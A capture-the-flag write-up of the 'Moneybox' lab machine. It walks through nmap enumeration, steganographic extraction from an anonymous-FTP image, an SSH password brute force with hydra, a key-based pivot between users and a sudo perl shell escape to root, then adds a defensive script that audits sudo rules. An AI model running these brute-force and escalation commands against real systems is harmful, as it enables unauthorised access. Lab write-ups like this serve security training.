# Proving Grounds Play: Moneybox

Proving Grounds Play - Moneybox CTF writeup.

### Nmap

```sh
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0         1093656 Feb 26  2021 trytofind.jpg
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.45.153
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 1e30ce7281e0a23d5c28888b12acfaac (RSA)
|   256 019dfafbf20637c012fc018b248f53ae (ECDSA)
|_  256 2f34b3d074b47f8d17d237b12e32f7eb (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: MoneyBox
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

### Fuzzing: Directories

```
/blogs
```

#### Landing page

![img](/files/cMSABheidRFKX4SoAPam)

Viewing the page source disclosed a hint about the secret directory:

```html
<!--the hint is the another secret directory is S3cr3t-T3xt-->
```

The source of the secret directory page disclosed a secret key: `<!..Secret Key 3xtr4ctd4t4 >`.

### FTP

FTP allows anonymous login.

![img](/files/n8CDkVsRrG9NRwrdboRF)

Download the image file and use the secret key found earlier as the passphrase to extract the hidden data.

```sh
steghide extract -sf trytofind.jpg
```

![img](/files/4oYzsQJZPzv2uMICWhPC)

A file named `data.txt` is written to the same directory. It contains a hint about the user and the password.

```
Hello.....  renu

      I tell you something Important.Your Password is too Week So Change Your Password
Don't Underestimate it.......
```

### Crack SSH credentials using hydra

```sh
hydra -l renu -P /usr/share/wordlists/rockyou.txt 192.168.180.230 -t 4 ssh
```

![img](/files/4OPR0YONehOIW3msOk9h)

SSH to user `renu` using the password.

**Initial Foothold obtained**

![img](/files/ZRgtCqj89ZFWU1cNkjKW)

After searching the directories as user `renu`, another user, `lily`, was found in the `/home` directory.

The user `lily` has an SSH authorized key that belongs to the user `renu`, so SSH to user `lily` from user `renu`.

![img](/files/iRrRkQ5B4XhbyXr1POxn)

### Enumerate user permission

```sh
sudo -l
```

![img](/files/28wMO5MQ3vRTgFAxBnR5)

### Privilege Escalation

#### Sudo

If `sudo` allows a binary such as `perl` to run as superuser, the binary does not drop the elevated privileges and may be used to access the file system, or to escalate or maintain privileged access.

```sh
sudo perl -e 'exec "/bin/sh";'
```

![img](/files/WbzPX8B0Jr9NO5ZNKtYc)

**Root Obtained**
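
A defender-side check for the misconfiguration this step relies on, as an added example that is not part of the original writeup: it parses `sudo -l` output and flags rules that let a user run a shell-capable program as root. The sample listing, the `SHELL_CAPABLE` set and the function name `audit_sudo_listing` are assumptions constructed for illustration.

```python
import re
from pathlib import PurePosixPath

# Illustrative, not exhaustive: programs that can run arbitrary code or spawn
# a shell, so a root sudo rule for one of them amounts to unrestricted root.
SHELL_CAPABLE = {"perl", "python", "python3", "ruby", "bash", "sh", "vim", "find", "awk"}

# A rule line looks like: "(runas[ : group]) [TAG: ...] command[, command...]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")
TAG_RE = re.compile(r"(?:(?:NO)?(?:PASSWD|EXEC|SETENV|MAIL|LOG_INPUT|LOG_OUTPUT|FOLLOW):\s*)+")

# Constructed sample in the format printed by `sudo -l`; not output from the target.
SAMPLE = """\
Matching Defaults entries for lily on host:
    env_reset, mail_badpass

User lily may run the following commands on host:
    (ALL : ALL) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/systemctl status apache2, /usr/bin/find
    (www-data) NOPASSWD: /usr/bin/python3
"""

def audit_sudo_listing(text):
    """Return findings for rules that let the user run shell-capable programs as root."""
    findings = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header, Defaults entries, blank lines
        runas_user = m.group("runas").split(":")[0].strip()
        if runas_user not in ("ALL", "root"):
            continue  # rule does not grant root
        rest = m.group("rest")
        tags = TAG_RE.match(rest)
        tag_text = tags.group(0) if tags else ""
        for cmd in rest[len(tag_text):].split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            name = "ALL" if cmd == "ALL" else PurePosixPath(cmd.split()[0]).name
            if name == "ALL" or name in SHELL_CAPABLE:
                findings.append({"command": cmd, "runas": runas_user,
                                 "nopasswd": "NOPASSWD:" in tag_text})
    return findings

if __name__ == "__main__":
    for f in audit_sudo_listing(SAMPLE):
        print(f"RISKY: {f['command']} as {f['runas']} (NOPASSWD={f['nopasswd']})")
```

Rules flagged this way are better replaced with a narrowly scoped wrapper script or removed, since restricting arguments to an interpreter does not contain it.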

Thanks for reading!

For more updates and insights, follow me on Twitter: [@thevillagehacker](https://twitter.com/thevillagehackr).


